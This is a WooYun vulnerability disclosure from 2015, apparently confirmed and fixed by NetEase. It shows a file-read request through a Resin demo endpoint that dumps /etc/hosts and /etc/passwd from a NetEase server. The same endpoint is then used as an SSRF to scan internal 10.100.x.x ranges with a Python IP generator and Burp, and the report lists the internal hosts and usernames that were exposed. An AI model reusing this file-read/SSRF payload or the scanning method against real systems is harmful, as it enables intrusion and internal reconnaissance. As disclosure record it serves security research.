当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157113

漏洞标题:网易某处文件读取可内网拓扑(差点进内网)

相关厂商:网易

漏洞作者: 殺器王子

提交时间:2015-11-30 17:30

修复时间:2016-01-17 14:54

公开时间:2016-01-17 14:54

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:13

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-30: 细节已通知厂商并且等待厂商处理中
2015-12-03: 厂商已经确认,细节仅向厂商公开
2015-12-13: 细节向核心白帽子及相关领域专家公开
2015-12-23: 细节向普通白帽子公开
2016-01-02: 细节向实习白帽子公开
2016-01-17: 细节向公众公开

简要描述:

你家楼下的全聚德很好吃,就是排队等号很讨厌。

详细说明:

http://220.181.8.205:8081//resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts


inputFile: /etc/hosts
127.0.0.1 localhost netease-datanode1
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts
192.168.2.108 host.zhu.org host
127.0.0.1 new1.bbs.163.com
#10.100.21.81 test.bbs.163.com
#220.181.29.116 newmq1.bbs.163.com
#220.181.29.116 newmq2.bbs.163.com
#for redis
192.168.86.36 redis.bbs.redis.rebuild
#redis-backup
#192.168.52.109 redis.bbs.redis.rebuild
#192.168.86.200 redis.bbs.redis.rebuild
#DB hosts
#192.168.51.169 bbs.db.mysql.rebuild
#192.168.51.169 new.db.mysql.bbs.news
#new bbs db
#192.168.51.169 v2.bbs.db.mysql
192.168.51.169 v2.2.bbs.db.mysql
#10.100.21.208 v2.2.bbs.db.mysql
10.100.21.208 v2.bbs.db.mysql
#10.100.21.208 sports.bbs.db.mysql
#10.100.21.208 news.bbs.db.mysql
192.168.51.169 sports.bbs.db.mysql
192.168.51.169 news.bbs.db.mysql
10.100.21.208 club.bbs.db.mysql
10.100.21.208 lady.bbs.db.mysql
10.100.21.208 money.bbs.db.mysql
10.100.21.208 bobo.bbs.db.mysql
#192.168.51.169 club.bbs.db.mysql
#192.168.51.169 lady.bbs.db.mysql
#192.168.51.169 money.bbs.db.mysql
192.168.51.169 test.bbs.db.mysql
#192.168.86.152 bbs.lady.bbs.mysql.163.com
#192.168.86.152 bbs.sz.house.bbs.mysql.163.com
#192.168.86.152 bbs.sh.house.bbs.mysql.163.com
#HBase
192.168.86.193 n5
192.168.51.152 n4
192.168.86.200 n3
192.168.86.118 n2
192.168.51.83 n1
10.100.20.173 n6
#106.2.34.79 hongbao.163.com
10.100.20.24 live.163.com
#10.100.20.47 redis.bbs.redis.rebuild
back to demo

inputFile: /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
ypxiao:x:1005:100::/home/ypxiao:/bin/sh
liuxb:x:1006:100::/home/liuxb:/bin/sh
strong:x:1013:4::/home/strong:/bin/sh
zhangjl:x:1014:4::/home/zhangjl:/bin/sh
xiongx:x:1015:4::/home/xiongx:/bin/sh
xgtai:x:1016:4::/home/xgtai:/bin/sh
rauljin:x:1017:4::/home/rauljin:/bin/sh
nagios:x:1019:1019::/home/nrpe:/sbin/nologin
messagebus:x:104:105::/var/run/dbus:/bin/false
wangjing:x:1020:100::/home/wangjing:/bin/sh
hujh:x:1021:100::/home/hujh:/bin/sh
hadoop:x:1022:1020::/home/hadoop:/bin/sh
gaofei:x:1023:100::/home/gaofei:/bin/sh
zhou.peng:x:1024:100::/home/zhou.peng:/bin/sh
hgliu:x:1025:100::/home/hgliu:/bin/sh
houhuihui:x:1026:100::/home/houhuihui:/bin/sh
fukan:x:1027:100::/home/fukan:/bin/sh
junli2010:x:1028:100::/home/junli2010:/bin/sh
bjzhaojh:x:1030:100::/home/bjzhaojh:/bin/sh
bjzhangxin:x:1032:4::/home/bjzhangxin:/bin/sh
liss:x:1039:100::/home/liss:/bin/sh
yangfan2010:x:1040:100::/home/yangfan2010:/bin/sh
sfniu:x:1041:100::/home/sfniu:/bin/sh
varnish:x:105:106::/home/varnish:/bin/false
varnishlog:x:106:107::/home/varnishlog:/bin/false
hyshang:x:1042:100::/home/hyshang:/bin/sh
linren:x:1043:100::/home/linren:/bin/sh
fabric:x:1044:100::/home/fabric:/bin/sh
sunxs:x:1045:100::/home/sunxs:/bin/sh
zhangjinpeng:x:1046:100::/home/zhangjinpeng:/bin/sh
bjzhangfeng:x:1047:100::/home/bjzhangfeng:/bin/sh
longbai:x:1049:100::/home/longbai:/bin/sh
hzchenxingxing:x:1050:100::/home/hzchenxingxing:/bin/sh
bjanduo:x:1051:4::/home/bjanduo:/bin/sh
back to demo


可以利用http://wiki.wooyun.org/pentest:filepath里的字典再爆破

38BCB11B-E0A5-4D0E-83D7-1A7DAA66EC32.png


漏洞证明:

该接口除了存在文件读取也可以当SSRF用。
使用个正则表达式匹配下ip段

((25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)\.){3}(25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|[1-9])

得到ip:
127.0.0.1
192.168.2.108
127.0.0.1
10.100.21.81
220.181.29.116
220.181.29.116
192.168.86.36
192.168.52.109
192.168.86.200
192.168.51.169
192.168.51.169
192.168.51.169
192.168.51.169
10.100.21.208
10.100.21.208
10.100.21.208
10.100.21.208
192.168.51.169
192.168.51.169
10.100.21.208
10.100.21.208
10.100.21.208
10.100.21.208
192.168.51.169
192.168.51.169
192.168.51.169
192.168.51.169
192.168.86.152
192.168.86.152
192.168.86.152
192.168.86.193
192.168.51.152
192.168.86.200
192.168.86.118
192.168.51.83
10.100.20.173
106.2.34.79
10.100.20.24
10.100.20.47
再使用python生成ip段扔入burp suite跑

import time
time_start = time.time()
def get_ip(number='10' ,start='1.1.1.1' ):
file = open('ip_list.txt', 'w')
starts = start.split( '.')
A = int(starts[0])
B = int(starts[1])
C = int(starts[2])
D = int(starts[3])
for A in range(A,256): #最大值为256
for B in range(B, 256):
for C in range(C, 256):
for D in range(D, 256):
ip = "%d.%d.%d.%d" %(A,B,C,D)

if number > 1:
file.write(ip+ '\n')
number -= 1
elif number == 1: #解决最后多一行回车问题
file.write(ip)
number -= 1
else:
file.close()
print ip
return
D = 0
C = 0
B = 0
get_ip(25500,'10.100.20.1') #生成ip数量,开使ip
time_end = time.time()
time = time_end - time_start
print '耗时%s秒' %time


1304FB3C-185D-46FE-871A-B6C0C95A27EB.png

成功则返回长度和失败的长度一目了然

4B114175-2C28-4CCF-AA12-CAE2712BB1AB.png


失败回返回500且长度大概为1650-1660之间。

6011C0B9-15E9-4664-91E2-9BDF9B001B3E.png

有些直接返回网页,说明即可正常访问。其中暴露不少后台或者内部系统等。

55	10.100.20.55	200	false	false	336	false	
57 10.100.20.57 200 false false 336 false
347 10.100.21.91 200 false false 336 false
144 10.100.20.144 200 false false 337 false
179 10.100.20.179 200 false false 337 false
397 10.100.21.141 200 false false 337 false
449 10.100.21.193 200 false false 337 false
454 10.100.21.198 200 false false 337 false
458 10.100.21.202 200 false false 337 false
462 10.100.21.206 200 false false 337 false
488 10.100.21.232 200 false false 337 false
110 10.100.20.110 200 false false 339 false
428 10.100.21.172 200 false false 345 false
261 10.100.21.5 200 false false 348 false
262 10.100.21.6 200 false false 348 false
15 10.100.20.15 200 false false 349 false
52 10.100.20.52 200 false false 349 false
273 10.100.21.17 200 false false 349 false
284 10.100.21.28 200 false false 349 false
343 10.100.21.87 200 false false 349 false
108 10.100.20.108 200 false false 350 false
114 10.100.20.114 200 false false 350 false
121 10.100.20.121 200 false false 350 false
180 10.100.20.180 200 false false 350 false
205 10.100.20.205 200 false false 350 false
206 10.100.20.206 200 false false 350 false
248 10.100.20.248 200 false false 350 false
254 10.100.20.254 200 false false 350 false
358 10.100.21.102 200 false false 350 false
359 10.100.21.103 200 false false 350 false
360 10.100.21.104 200 false false 350 false
361 10.100.21.105 200 false false 350 false
388 10.100.21.132 200 false false 350 false
389 10.100.21.133 200 false false 350 false
390 10.100.21.134 200 false false 350 false
395 10.100.21.139 200 false false 350 false
396 10.100.21.140 200 false false 350 false
465 10.100.21.209 200 false false 350 false
466 10.100.21.210 200 false false 350 false
467 10.100.21.211 200 false false 350 false
468 10.100.21.212 200 false false 350 false
473 10.100.21.217 200 false false 350 false
54 10.100.20.54 200 false false 352 false
0 200 false false 355 false baseline request
128 10.100.20.128 200 false false 359 false
140 10.100.20.140 200 false false 359 false
299 10.100.21.43 200 false false 376 false
338 10.100.21.82 200 false false 376 false
340 10.100.21.84 200 false false 376 false
391 10.100.21.135 200 false false 377 false
394 10.100.21.138 200 false false 377 false
399 10.100.21.143 200 false false 377 false
457 10.100.21.201 200 false false 377 false
463 10.100.21.207 200 false false 377 false
498 10.100.21.242 200 false false 377 false
125 10.100.20.125 200 false false 403 false
39 10.100.20.39 200 false false 404 false
132 10.100.20.132 200 false false 405 false
440 10.100.21.184 200 false false 405 false
362 10.100.21.106 200 false false 441 false
63 10.100.20.63 200 false false 447 false
91 10.100.20.91 200 false false 447 false
168 10.100.20.168 200 false false 448 false
2609 10.100.30.49 200 false false 463 false
4 10.100.20.4 200 false false 487 false
270 10.100.21.14 200 false false 488 false
352 10.100.21.96 200 false false 488 false
135 10.100.20.135 200 false false 489 false
161 10.100.20.161 200 false false 489 false
204 10.100.20.204 200 false false 489 false
356 10.100.21.100 200 false false 489 false
372 10.100.21.116 200 false false 489 false
382 10.100.21.126 200 false false 489 false
279 10.100.21.23 200 false false 491 false
238 10.100.20.238 200 false false 492 false
422 10.100.21.166 200 false false 492 false
264 10.100.21.8 200 false false 496 false
11 10.100.20.11 200 false false 497 false
59 10.100.20.59 200 false false 497 false
60 10.100.20.60 200 false false 497 false
64 10.100.20.64 200 false false 497 false
326 10.100.21.70 200 false false 497 false
10 10.100.20.10 200 false false 498 false
9 10.100.20.9 200 false false 498 false
20 10.100.20.20 200 false false 498 false
237 10.100.20.237 200 false false 498 false
471 10.100.21.215 200 false false 498 false
472 10.100.21.216 200 false false 498 false
478 10.100.21.222 200 false false 498 false
14 10.100.20.14 200 false false 499 false
23 10.100.20.23 200 false false 499 false
50 10.100.20.50 200 false false 499 false
56 10.100.20.56 200 false false 499 false
69 10.100.20.69 200 false false 499 false
71 10.100.20.71 200 false false 499 false
76 10.100.20.76 200 false false 499 false
287 10.100.21.31 200 false false 499 false
288 10.100.21.32 200 false false 499 false
329 10.100.21.73 200 false false 499 false
330 10.100.21.74 200 false false 499 false
335 10.100.21.79 200 false false 499 false
354 10.100.21.98 200 false false 499 false
117 10.100.20.117 200 false false 500 false
118 10.100.20.118 200 false false 500 false
129 10.100.20.129 200 false false 500 false
130 10.100.20.130 200 false false 500 false
137 10.100.20.137 200 false false 500 false
170 10.100.20.170 200 false false 500 false
171 10.100.20.171 200 false false 500 false
185 10.100.20.185 200 false false 500 false
223 10.100.20.223 200 false false 500 false
224 10.100.20.224 200 false false 500 false
225 10.100.20.225 200 false false 500 false
231 10.100.20.231 200 false false 500 false
242 10.100.20.242 200 false false 500 false
363 10.100.21.107 200 false false 500 false
366 10.100.21.110 200 false false 500 false
367 10.100.21.111 200 false false 500 false
368 10.100.21.112 200 false false 500 false
369 10.100.21.113 200 false false 500 false
378 10.100.21.122 200 false false 500 false
417 10.100.21.161 200 false false 500 false
420 10.100.21.164 200 false false 500 false
436 10.100.21.180 200 false false 500 false
437 10.100.21.181 200 false false 500 false
475 10.100.21.219 200 false false 500 false
95 10.100.20.95 200 false false 503 false
94 10.100.20.94 200 false false 503 false
97 10.100.20.97 200 false false 503 false
348 10.100.21.92 200 false false 503 false
247 10.100.20.247 200 false false 504 false
398 10.100.21.142 200 false false 504 false
400 10.100.21.144 200 false false 504 false
2638 10.100.30.78 200 false false 504 false
12 10.100.20.12 200 false false 505 false
342 10.100.21.86 200 false false 505 false
353 10.100.21.97 200 false false 505 false
29 10.100.20.29 200 false false 506 false
48 10.100.20.48 200 false false 506 false
61 10.100.20.61 200 false false 506 false
72 10.100.20.72 200 false false 506 false
81 10.100.20.81 200 false false 506 false
88 10.100.20.88 200 false false 506 false
93 10.100.20.93 200 false false 506 false
92 10.100.20.92 200 false false 506 false
211 10.100.20.211 200 false false 506 false
271 10.100.21.15 200 false false 506 false
281 10.100.21.25 200 false false 506 false
418 10.100.21.162 200 false false 506 false
455 10.100.21.199 200 false false 506 false
485 10.100.21.229 200 false false 506 false
486 10.100.21.230 200 false false 506 false
104 10.100.20.104 200 false false 507 false
181 10.100.20.181 200 false false 507 false
191 10.100.20.191 200 false false 507 false
202 10.100.20.202 200 false false 507 false
203 10.100.20.203 200 false false 507 false
208 10.100.20.208 200 false false 507 false
502 10.100.21.246 200 false false 508 false
296 10.100.21.40 200 false false 509 false
100 10.100.20.100 200 false false 510 false
175 10.100.20.175 200 false false 510 false
405 10.100.21.149 200 false false 510 false
406 10.100.21.150 200 false false 510 false
407 10.100.21.151 200 false false 510 false
413 10.100.21.157 200 false false 510 false
442 10.100.21.186 200 false false 510 false
459 10.100.21.203 200 false false 510 false
499 10.100.21.243 200 false false 510 false
221 10.100.20.221 200 false false 511 false
341 10.100.21.85 200 false false 512 false
166 10.100.20.166 200 false false 513 false
319 10.100.21.63 200 false false 513 false
461 10.100.21.205 200 false false 513 false
79 10.100.20.79 200 false false 514 false
173 10.100.20.173 200 false false 514 false
448 10.100.21.192 200 false false 514 false
451 10.100.21.195 200 false false 514 false
384 10.100.21.128 200 false false 515 false
456 10.100.21.200 200 false false 522 false
258 10.100.21.2 200 false false 538 false
2567 10.100.30.7 200 false false 538 false
357 10.100.21.101 200 false false 540 false
285 10.100.21.29 200 false false 543 false
346 10.100.21.90 200 false false 543 false
115 10.100.20.115 200 false false 544 false
377 10.100.21.121 200 false false 544 false
477 10.100.21.221 200 false false 544 false
294 10.100.21.38 200 false false 556 false
479 10.100.21.223 200 false false 602 false
2653 10.100.30.93 200 false false 615 false
13 10.100.20.13 200 false false 624 false
87 10.100.20.87 200 false false 627 false
85 10.100.20.85 200 false false 628 false
70 10.100.20.70 200 false false 679 false
157 10.100.20.157 200 false false 707 false
345 10.100.21.89 200 false false 744 false
182 10.100.20.182 200 false false 745 false
392 10.100.21.136 200 false false 865 false
393 10.100.21.137 200 false false 865 false
98 10.100.20.98 200 false false 874 false
308 10.100.21.52 200 false false 874 false
96 10.100.20.96 200 false false 892 false
489 10.100.21.233 200 false false 893 false
500 10.100.21.244 200 false false 915 false
337 10.100.21.81 200 false false 935 false
154 10.100.20.154 200 false false 938 false
450 10.100.21.194 200 false false 938 false
504 10.100.21.248 200 false false 938 false
17 10.100.20.17 200 false false 949 false
24 10.100.20.24 200 false false 949 false
28 10.100.20.28 200 false false 949 false
31 10.100.20.31 200 false false 949 false
35 10.100.20.35 200 false false 949 false
278 10.100.21.22 200 false false 949 false
282 10.100.21.26 200 false false 949 false
109 10.100.20.109 200 false false 950 false
123 10.100.20.123 200 false false 950 false
134 10.100.20.134 200 false false 950 false
158 10.100.20.158 200 false false 950 false
186 10.100.20.186 200 false false 950 false
385 10.100.21.129 200 false false 950 false
510 10.100.21.254 200 false false 950 false
178 10.100.20.178 200 false false 1205 false
5 10.100.20.5 200 false false 1337 false
58 10.100.20.58 200 false false 1341 false
212 10.100.20.212 200 false false 1345 false
42 10.100.20.42 200 false false 1365 false

修复方案:

https://login.netease.com/accounts/login/?next=/sitemgnt/

D2C521BD-3A29-472D-95AE-280CFABFA35E.png


版权声明:转载请注明来源 殺器王子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-03 14:54

厂商回复:

漏洞已修复,感谢您对网易产品的关注。

最新状态:

暂无


漏洞评价:

评价

  1. 2015-11-30 18:56 | xsser 认证白帽子 ( 普通白帽子 | Rank:267 漏洞数:20 | 当我又回首一切,这个世界会好吗?)

    总是差那么一点哦

  2. 2015-12-03 16:13 | 土夫子 ( 普通白帽子 | Rank:399 漏洞数:75 | 看似山穷水尽,终将柳喑花明)

    @xsser 二次编辑,求审 http://wooyun.org/bugs/wooyun-2015-0157605

  3. 2015-12-03 17:30 | 心云 ( 普通白帽子 | Rank:184 漏洞数:57 | Rank:200 漏洞数:55 | Rank:300 漏洞数:70 ...)

    @xsser 求审洞 非常谢谢^_^

  4. 2015-12-03 17:43 | 土夫子 ( 普通白帽子 | Rank:399 漏洞数:75 | 看似山穷水尽,终将柳喑花明)

    @心云 乌云的兄弟们太忙了

  5. 2015-12-03 17:48 | 心云 ( 普通白帽子 | Rank:184 漏洞数:57 | Rank:200 漏洞数:55 | Rank:300 漏洞数:70 ...)

    @土夫子 总结出一个道理,提交大厂商的审得很快,小厂商慢慢等